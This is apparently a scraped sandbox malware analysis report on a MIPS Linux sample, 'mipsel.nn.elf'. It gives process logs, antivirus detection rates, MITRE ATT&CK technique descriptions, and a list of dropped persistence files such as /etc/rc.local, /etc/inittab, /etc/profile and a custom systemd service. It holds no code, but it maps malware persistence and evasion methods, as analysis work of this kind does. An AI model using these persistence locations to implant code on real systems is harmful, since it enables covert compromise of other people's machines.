Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:17:43
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:17:43
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:18:09
Start date (UTC):	27/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:09
Start date (UTC):	27/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.URJbj7AbQI /tmp/tmp.oXh8TVRtl9 /tmp/tmp.ILWPfpc4gs
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:18:09
Start date (UTC):	27/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:09
Start date (UTC):	27/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.URJbj7AbQI /tmp/tmp.oXh8TVRtl9 /tmp/tmp.ILWPfpc4gs
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Source: mipsel.nn.elf	Virustotal: Detection: 38%			Perma Link
Source: mipsel.nn.elf	ReversingLabs: Detection: 42%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report mipsel.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/mipsel.nn.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.9AgHYw (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: mipsel.nn.elf PID: 6207, Parent PID: 6125

General

Chronological Activities

Analysis Process: mipsel.nn.elf PID: 6224, Parent PID: 6207

General

Chronological Activities

Analysis Process: sh PID: 6224, Parent PID: 6207

Linux Analysis Report
mipsel.nn.elf